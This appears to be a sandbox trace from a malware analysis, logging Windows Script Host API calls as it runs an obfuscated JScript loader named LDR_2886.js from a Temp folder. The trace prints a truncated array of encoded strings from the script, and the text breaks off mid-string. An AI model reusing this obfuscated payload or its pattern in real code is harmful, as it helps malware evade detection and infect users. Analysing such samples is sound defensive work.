	[0090.010] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x2fee00, cchData=6 | out: lpLCData="1252") returned 5
	[0090.010] IsValidCodePage (CodePage=0x4e4) returned 1
	[0090.010] CoCreateInstance (in: rclsid=0x7fee1475d88*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee1475d98*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x196af0 | out: ppv=0x196af0*=0x4575b0) returned 0x0
	[0090.010] IUnknown:AddRef (This=0x4575b0) returned 0x2
	[0090.010] GetCurrentProcessId () returned 0x154
	[0090.010] GetCurrentThreadId () returned 0xb9c
	[0090.010] GetTickCount () returned 0x27177
	[0090.010] ISystemDebugEventFire:BeginSession (This=0x4575b0, guidSourceID=0x7fee1475da8, strSessionName="JScript:00000340:00002972:18160119") returned 0x0
	[0090.010] GetCurrentThreadId () returned 0xb9c
	[0090.010] ??2@YAPEAX_K@Z () returned 0x1971e0
	[0090.010] ??2@YAPEAX_K@Z () returned 0x197230
	[0090.010] malloc (_Size=0x80) returned 0x1972e0
	[0090.010] malloc (_Size=0x108) returned 0x197370
	[0090.010] GetTickCount () returned 0x27177
	[0090.011] GetCurrentThreadId () returned 0xb9c
	[0090.011] ??2@YAPEAX_K@Z () returned 0x197480
	[0090.011] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js" (normalized: "c:\\users\\aetadzjz\\appdata\\local\\temp\\ldr_2886.js"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8000000, hTemplateFile=0x0) returned 0x110
	[0090.011] GetFileSize (in: hFile=0x110, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0090.011] CreateFileMappingA (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x2, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x4b68, lpName=0x0) returned 0x114
	[0090.011] MapViewOfFile (hFileMappingObject=0x114, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x110000
	[0090.011] GetVersionExA (in: lpVersionInformation=0x2fefb0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xfd343301, dwBuildNumber=0x7fe, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2fefb0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0090.011] IsTextUnicode (in: lpv=0x110000, iSize=19304, lpiResult=0x2fefa0 | out: lpiResult=0x2fefa0) returned 0
	[0090.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x110000, cbMultiByte=19304, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 19304
	[0090.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x110000, cbMultiByte=19304, lpWideCharStr=0x45f978, cchWideChar=19304 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4Mrw6BAdMOfw4XCiULCsXXDlcOlRsKXLRA2woLDoMOvw47DkMO2w6YIw6DDqsO1w7/DmsKndWATwoU3w4ozwqdLYsOsJ0XCrw==','w51Tw57CqzXDuQ==','WsKDc8KJ','Bz7DhMKND8KfesK+HR7DuMKDw4Fj','w5lhw43Cvg7Dj8OMwoDDjmE7exhkLcKCGcOiwoYwdsKlwonDu8OAwqlWfyXDiWNDeBHDlX4YbMKuFHjCpsKTFMOTwqdCwqJQwpDDpyVmFMKyO8O0w5MQw5oxwqvDj1XDpG/DrcKtw6A5wqvCkUA=','C0PCtErCp8KoZRjCkRAMwpo+w7w8d8KpA8OUw6XCjMKxwrIMwqrCoA==','w7Nowr8AwrI2AsK1FndyT3rDgMOWw68CLcKLF2QawpVtdMOHKFdFCXgLw4fCosO7D3gncsK/ScOow74dw6jCp8KZTcKHw4PCrcKbwqbCp8Oew5M7wrDDhsOaDcO9','OcOlwq3CucO2w5hLw4N0CcO1w4A=','Vn7DjiDDu8Kjw4I9wrRPwr3CrAzCh0I=','w7XDjWwjwrzCoANpAMOlSCgQB8OPBA==','T0gswqrDrcObbRBLLsONwpHCrMOzw41vw6LDnR3CgEJxw4/DgMKbTcOOTMOVw4BEw5TDtcOPSw==','w4BfwrnCgcO7ImweNx7CiMObw6EdeCXDigHCnzU=','wp/Dl8KawrrDm8KzcQ==','bnwjwpPDm8KqD1F+','B8KyGsOh','K8O1wqnDsiTCnMKtwrYTfQ/CpcK8EUbCuBUuw5nCncOlw4PCsmEpwr7CgcKtEQ==','wq7CksKWw50u','wrPDh8O8WMKvEsOESMOFQMKgXXPDqsKEX8KlIsO2NELDu8KvA8Olw6cOL8K6wqDCukkVS8Oswr06Di/CocOmRsO6wptnwoNtAMKzw6lRw5ofPMOHNhJb") returned 19304
	[0090.012] UnmapViewOfFile (lpBaseAddress=0x110000) returned 1
	[0090.012] CloseHandle (hObject=0x114) returned 1
	[0090.012] CloseHandle (hObject=0x110) returned 1
	[0090.013] GetSystemDirectoryA (in: lpBuffer=0x2ff028, uSize=0x0 | out: lpBuffer="lô/") returned 0x14
	[0090.013] ??2@YAPEAX_K@Z () returned 0x1974d0
	[0090.013] GetSystemDirectoryA (in: lpBuffer=0x1974d0, uSize=0x15 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0090.013] LoadLibraryA (lpLibFileName="C:\\Windows\\system32\\advapi32.dll") returned 0x7fefd710000
	[0090.013] ??3@YAXPEAX@Z () returned 0x31921001
	[0090.013] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferIdentifyLevel") returned 0x7fefd72e470
	[0090.013] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferComputeTokenFromLevel") returned 0x7fefd72f9b0
	[0090.013] GetProcAddress (hModule=0x7fefd710000, lpProcName="SaferCloseLevel") returned 0x7fefd72f660
	[0090.013] IdentifyCodeAuthzLevelW () returned 0x1
	[0090.062] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2fe1a0 | out: lpSystemTimeAsFileTime=0x2fe1a0*(dwLowDateTime=0xae05a8d0, dwHighDateTime=0x1d543d1)) 
	[0090.062] GetCurrentProcessId () returned 0x154
	[0090.062] GetCurrentThreadId () returned 0xb9c
	[0090.062] GetTickCount () returned 0x271a6
	[0090.062] QueryPerformanceCounter (in: lpPerformanceCount=0x2fe1a8 | out: lpPerformanceCount=0x2fe1a8*=21448825820) returned 1
	[0090.062] malloc (_Size=0x100) returned 0x197b60
	[0090.063] GetVersionExA (in: lpVersionInformation=0x2fdf80*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0xe33af810, dwBuildNumber=0x7fe, dwPlatformId=0xe33a0000, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x2fdf80*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0090.063] GetUserDefaultLCID () returned 0x409
	[0090.063] IsFileSupportedName () returned 0x1
	[0090.063] _wcsicmp (_String1=".vbs", _String2=".js") returned 12
	[0090.063] _wcsicmp (_String1=".vbe", _String2=".js") returned 12
	[0090.063] _wcsicmp (_String1=".js", _String2=".js") returned 0
	[0090.275] GetSignedDataMsg () returned 0x0
	[0090.275] GetCurrentProcess () returned 0xffffffffffffffff
	[0090.275] DuplicateHandle (in: hSourceProcessHandle=0xffffffffffffffff, hSourceHandle=0x114, hTargetProcessHandle=0xffffffffffffffff, lpTargetHandle=0x2fe7e0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x2fe7e0*=0x140) returned 1
	[0090.275] GetFileSize (in: hFile=0x140, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x4b68
	[0090.275] ??2@YAPEAX_K@Z () returned 0x19a4f0
	[0090.275] SetFilePointer (in: hFile=0x140, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0
	[0090.275] ReadFile (in: hFile=0x140, lpBuffer=0x19a4f0, nNumberOfBytesToRead=0x4b68, lpNumberOfBytesRead=0x2fe7c0, lpOverlapped=0x0 | out: lpBuffer=0x19a4f0*, lpNumberOfBytesRead=0x2fe7c0*=0x4b68, lpOverlapped=0x0) returned 1
	[0090.276] CoInitialize (pvReserved=0x0) returned 0x1
	[0090.276] CoCreateInstance (in: rclsid=0x7fee33af850*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppv=0x2fe730 | out: ppv=0x2fe730*=0x19f4c0) returned 0x0
	[0090.279] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2fc930 | out: lpSystemTimeAsFileTime=0x2fc930*(dwLowDateTime=0xae26fc10, dwHighDateTime=0x1d543d1)) 
	[0090.279] GetCurrentProcessId () returned 0x154
	[0090.279] GetCurrentThreadId () returned 0xb9c
	[0090.279] GetTickCount () returned 0x27280
	[0090.279] QueryPerformanceCounter (in: lpPerformanceCount=0x2fc938 | out: lpPerformanceCount=0x2fc938*=21470557661) returned 1
	[0090.280] malloc (_Size=0x100) returned 0x197c70
	[0090.280] __dllonexit () returned 0x7fedf7914c0
	[0090.280] __dllonexit () returned 0x7fedf7914e8
	[0090.280] GetVersionExA (in: lpVersionInformation=0x2fc710*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x7fe, dwMinorVersion=0xdf792dc9, dwBuildNumber=0x7fe, dwPlatformId=0xdf7914e8, szCSDVersion="\xfe\x07") | out: lpVersionInformation=0x2fc710*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0090.280] GetProcessWindowStation () returned 0x30
	[0090.280] GetUserObjectInformationA (in: hObj=0x30, nIndex=1, pvInfo=0x2fc6f8, nLength=0xc, lpnLengthNeeded=0x2fc6f0 | out: pvInfo=0x2fc6f8, lpnLengthNeeded=0x2fc6f0) returned 1
	[0090.280] ??2@YAPEAX_K@Z () returned 0x19f060
	[0090.280] ??2@YAPEAX_K@Z () returned 0x19f0b0
	[0090.280] ??2@YAPEAX_K@Z () returned 0x19f0e0
	[0090.280] ??2@YAPEAX_K@Z () returned 0x19f120
	[0090.280] ??2@YAPEAX_K@Z () returned 0x19f160
	[0090.280] ??2@YAPEAX_K@Z () returned 0x19f1a0
	[0090.280] ??2@YAPEAX_K@Z () returned 0x19f1e0
	[0090.280] ??2@YAPEAX_K@Z () returned 0x19f220
	[0090.280] ??2@YAPEAX_K@Z () returned 0x19f260
	[0090.280] ??2@YAPEAX_K@Z () returned 0x19f2a0
	[0090.280] ??2@YAPEAX_K@Z () returned 0x19f2e0
	[0090.280] ??3@YAXPEAX@Z () returned 0x31921001
	[0090.280] ??2@YAPEAX_K@Z () returned 0x19f330
	[0090.280] ??2@YAPEAX_K@Z () returned 0x19f370
	[0090.280] DllGetClassObject (in: rclsid=0x45e400*(Data1=0x6290bd1, Data2=0x48aa, Data3=0x11d2, Data4=([0]=0x84, [1]=0x32, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), riid=0x7fefebb6cd0*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2fd400 | out: ppv=0x2fd400*=0x19f0b0) returned 0x0
	[0090.281] ??2@YAPEAX_K@Z () returned 0x19f0b0
	[0090.281] IClassFactory:CreateInstance (in: This=0x19f0b0, pUnkOuter=0x0, riid=0x2fe1e0*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x2fd420 | out: ppvObject=0x2fd420*=0x19f4c0) returned 0x0
	[0090.281] ??2@YAPEAX_K@Z () returned 0x19f3b0
	[0090.281] GetSystemInfo (in: lpSystemInfo=0x2fd260 | out: lpSystemInfo=0x2fd260*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7fffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) 
	[0090.281] VirtualQuery (in: lpAddress=0x2fd2d0, lpBuffer=0x2fd290, dwLength=0x30 | out: lpBuffer=0x2fd290*(BaseAddress=0x2fd000, AllocationBase=0x200000, AllocationProtect=0x4, __alignment1=0xfffff880, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0090.281] ??2@YAPEAX_K@Z () returned 0x19f3f0
	[0090.281] ??2@YAPEAX_K@Z () returned 0x19f410
	[0090.281] ??2@YAPEAX_K@Z () returned 0x19f470
	[0090.281] ??2@YAPEAX_K@Z () returned 0x19f4a0
	[0090.281] ??2@YAPEAX_K@Z () returned 0x19f550
	[0090.281] IUnknown:AddRef (This=0x19f4c0) returned 0x2
	[0090.281] IUnknown:Release (This=0x19f4c0) returned 0x1
	[0090.281] IUnknown:Release (This=0x19f0b0) returned 0x0
	[0090.281] ??3@YAXPEAX@Z () returned 0x31921001
	[0090.281] IUnknown:QueryInterface (in: This=0x19f4c0, riid=0x7fee33af860*(Data1=0xe4d1c9b0, Data2=0x46e8, Data3=0x11d4, Data4=([0]=0xa2, [1]=0xa6, [2]=0x0, [3]=0x10, [4]=0x4b, [5]=0xd3, [6]=0x50, [7]=0x90)), ppvObject=0x2fe668 | out: ppvObject=0x2fe668*=0x19f4c0) returned 0x0
	[0090.281] IUnknown:Release (This=0x19f4c0) returned 0x1
	[0090.282] _strnicmp (_Str1="<?xml", _Str="var d", _MaxCount=0x5) returned -58
	[0090.282] IsTextUnicode (in: lpv=0x19a4f0, iSize=19304, lpiResult=0x2fe6b8 | out: lpiResult=0x2fe6b8) returned 0
	[0090.282] GetACP () returned 0x4e4
	[0090.282] malloc (_Size=0x97d0) returned 0x30dfd0
	[0090.282] GetACP () returned 0x4e4
	[0090.282] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x19a4f0, cbMultiByte=19304, lpWideCharStr=0x30dfd0, cchWideChar=19432 | out: lpWideCharStr="var dogoswoisosfhsdiefgssqda=['wqtowqjClg==','w5Mcwr/DvcOsK2cuBQ==','wrvDpsOqD8KNwpbCjh8pasKgV8Ozb1xZw7jDu8OwwrtSXDnDgMOwa0XCr8OAw69Dw79yA8OW','w5/Cn8KKbMK5HsOefsOg','MErCsEPDhcKacRHCmA==','wozDhsKiwrPDl8KxFAY=','woHDt2ZcPMOsGXtZQcOIwrnDj1lVNsOURHfDgl0kw4tDw4RSw7HCn8Omw5JpXDotC8O7eMKVwpxeYw==','wrDCpsOTwqBiwqfDjELCj27CoETDmHnDnxhqw5fClMKJGsOzwoPCqcOYQm1XW3sBCsOEPcKfZiU7EzrDuMODwp7Cp8OaKMOHw4wDVD5ZfMONfsO/w5c/wq5Ww7jChcOTwrNeIGbDs8KrPVvDqyEjOsKmKDxiwp5aw7jCtgTDuxxXacO3OHJsVk5XwozDvzrCpg==','wqprwqgaw4jCih0=','wofDo8KZwpvDq8KMYn/ConzDt8Kyw6xiQsOIE8OWwrFHPsO3w4PCiEHCk8K3wq7Cn1g=','wozDkcKcwozCmMO4Ew3CojHCnQ==','w7JGw6XCpS4=','w49sw43DuMKR','wrVrwr05w4o=','w4QQwpzCqMK9','wqrDu8OaCsOw','AHliEUE=','UxoSMTA=','UhQDDwg=','cwtkccKr','w79Mw6/DjsKfwqnCi8OTw5FhG8OgFnpkJA==','wowhFljClA==','csO8AMOuZA==','bhADAg==','woTCr8Owwr1N','TErDmMK6wos=','NAbDsMOpNw==','wq7DmsKJw4Z5','wqvCvEbCoks=','w5DDszthPQ==','wrDDgcKlZsKz','wqnDjsKVXcK9','wrrCs8KEDcOY','WcKzfsKnfA==','QTp1VsKB','wqrDicOVbsKL','enXCv8K7','w64uwqc2w4Y=','HnBCBg==','wqYCYQYf','XFbDmMKnwoDCi8Kew6/DpmjCrg==','wo1iUsO9Pw==','w7zDgcOjP8Kt','Rg11bsKR','w5pBwqUBwo8=','O2XCk8O/w6A=','woXCk8OZwrZq','wrvCu8Owwot+','wq5owo0pw64=','ZsOmG8OlTw==','e8OPwq4qMQ==','YhZ3d8Ki','w4BbwpvCt8OY','w7o+woQsw4s=','wojDosO+LcOW','ZH7DvC/DlQ==','c3dOwozChQ==','woVCZsOBPw==','TQxZW8Kn','PRTDssOyFw==','wpcDwpvDmsOo','RlTDuMKywqA=','NsKlecK7w7Q=','YMO/EsOldg==','w55Qw7nDosKj','w5DDmcOseDvDjsKhw4jChX0cVA3DkW/CqMKTw5QLXMOHcMKowrrCux1bwqoBRsKPw79aAGMbw6B4ZTLCrMKKBsKVwq7DglMRK8KRHjTCuMK8w514JxRiwr3DgcKX','wrXClsKBHMOa','wofDu8OVNsOZ','wqXCksOSwoU=','w61Jw6zCsCs=','XMOwOcOz','w6fCq8OoGWE=','LFYlKX0=','wobCgcKOw6ck','w7NpwpfCksOK','GUTCrcOhw7k=','HMOuwqLCn18=','w51Lw7zCoyo=','woZ5TMO8HA==','wqIMDH3Cr8KFQyNUwq8w','w5zDt2Mxwqc=','CMKwDcOTw4w=','I1NBHlA=','w4ljw6XCpzE=','wp8zwqLDkMOy','wqLCh8ONwph/','w7/DmMOLMA==','wqDDnMO6ZcKf','w4V4wp4RwoweF8OtH110dE4=','wp7DoMO6PsOVw5ZJFsOQbMKJCELCow==','DEvCrcOWw6hQwq4jKMOWHwrCqMK+w7J1wqPDhyk=','wpAMI0DCkw==','w7DDuH0rwr8=','OSrDhsOAOcKVQsKIXFXDpsOIwrYRwo0y','wpfCvMOQwotA','wqXCi1rCgm0=','d37CtMK6','F3JpGko=','wpfCnsKzOsO2','Gn9GHWs=','WlXDnsKKwok=','P8OnwrPDp8K6','XQxsS8KX','w4BBw5LDmsKj','LMOVwqvClsOq','wqHChUHCrmc=','dnfCl8KKw4s=','wrzDi8KEw75j','w5ELwpUqw5E=','HGLCv8O5w4M=','O8OCwpfCs0s=','w59uw6rDmMK/','NsOTwonCnms=','OcOrwqvCvV4=','VUHDj8KFwrE=','w6PDssO3KsKg','VcKqXMKseA==','KcOWwpHDq8KJ','wonDtcKkwqlF','wrjCt8KIw5gFIQ==','G8Orwr/DsAE=','w51iwpwgwpw=','wrrDi8KQw75X','U2hiwoPClA==','wovDjsKpwohCQw4=','PVV+A0E=','w75OwpMEwpEG','RQYPLiM=','TUPDoSjDng==','w6nDigxBCw==','wrTCnsK5LMOh','esKJZMKIfA==','wqgkNXTCng==','JMOKw7zCvw==','wrENRAc5','O8OUwpHDpsKa','eXfCuMK8','BznDhcORJw==','QmRawpbCosOIe8KsEXTCow==','UEdxwqTCpQ==','w4xdw4/CpSY=','H8OFwrTDisKc','SMOdwo8SPA==','d8KmRcKYew==','w7ELwoLCj8KIw4F4','G8OZwoTDiTw=','wq7DhcKYwrdc','wpvCgMK2M8OR','wpHDr8Krw5Fh','wqfDl8K7wrTDrg==','YcOhanFu','IcO7w6bChSI=','wqfDoMK0bMKm','wqrChcKCH8O0','w5Zww6DDrsKS','w4TDmMOjEMKg','PDDDhsOQOcKOWMKFCBDDiA==','wqrDnMKkwo7Dn8O0G0nCgW3Dg8ORwq9ISg==','w7TDh8OSMsKR','PSfDscOCHg==','wqXCsE7CsnM=','w5TDkSVzAQ==','PsONwrHDlCg=','MsOKwpzDlMKK','RWYWwpnDvg==','woMbB1bCqQ==','wqbCmsKQw6Ia','wo7DqMKtVMKt','czRabsKB','ADDCiTnDhcOhGn/Diix+woFBwptnaMKKTcOlwo3DgMOEwq1GwobDjMKxw5PDtcOtwoLDlsOgw57DuFUgwrVcwqcJMR7CnmbCnQbDnAhKw7QHwrhuM8Odw68AFcKbOsOB','w5DDt1cuwo8=','W0fDisKn','wobDhMKSwoh5','cVrCm8K+w6A=','w6HDksORKg==','wrfCpVHCjlM=','w7dEw7fCly8=','w6fDrTNQJg==','w6wne8Oiw50=','woJqwokjw50=','wqjClMKNw4gz','Fl3CgljCqw==','woddeMOeMsKJwoHCj8OaNno=','wo0rFljCjQ==','w5FWw6rChig=','wpHDqsK2w4Y=','wqHCs1rCuw==','w6NfwprCsMO1FA==','BsKiMcORw5M=','w4tHw5bCsgw=','w5YwRsOmw6HDicKQw7ZEXcOB','w6UMwp7CjcKZwoQiwo5zdHrDj8KBRsOf','wqEmXCgH','S8O6JMO0aMKow7A1bQLCrg==','w6QTZcO8w7o=','fcKneMK0SA==','woPDj8OdUcKH','w4Ffw6zDn8KB','f0fCl8KIw6E=','w6jCvMOqPXU=','wp3CjMKCw4cN','wrYOcRgw','wpx6wpQ+w5U=','w6nClMO6Ilc=','w7rDgMOvGMKM','wqfDtMKTU8Ky','wrjCkFXCgGfDpMODwprDh8OMwrnDs8KiSgsWwplte8K1woILw4rCs8KbRQ0CwqpeGR1qwrvDv2zCmQnDozBPOcKlU8KDdwZ5V8KzbsKhwrrDtMOQwrlGFsKmw7JSNmF5BsOTLsKMHF9kwoHCmsOzLx3Dg8KsbcKkFcKuNnvCjA==','w43DlsKCHMKLwqDChxo5TcKScsO6fWQ8w47DvcObwr9UT3fDhsOpW0vCvMOLw4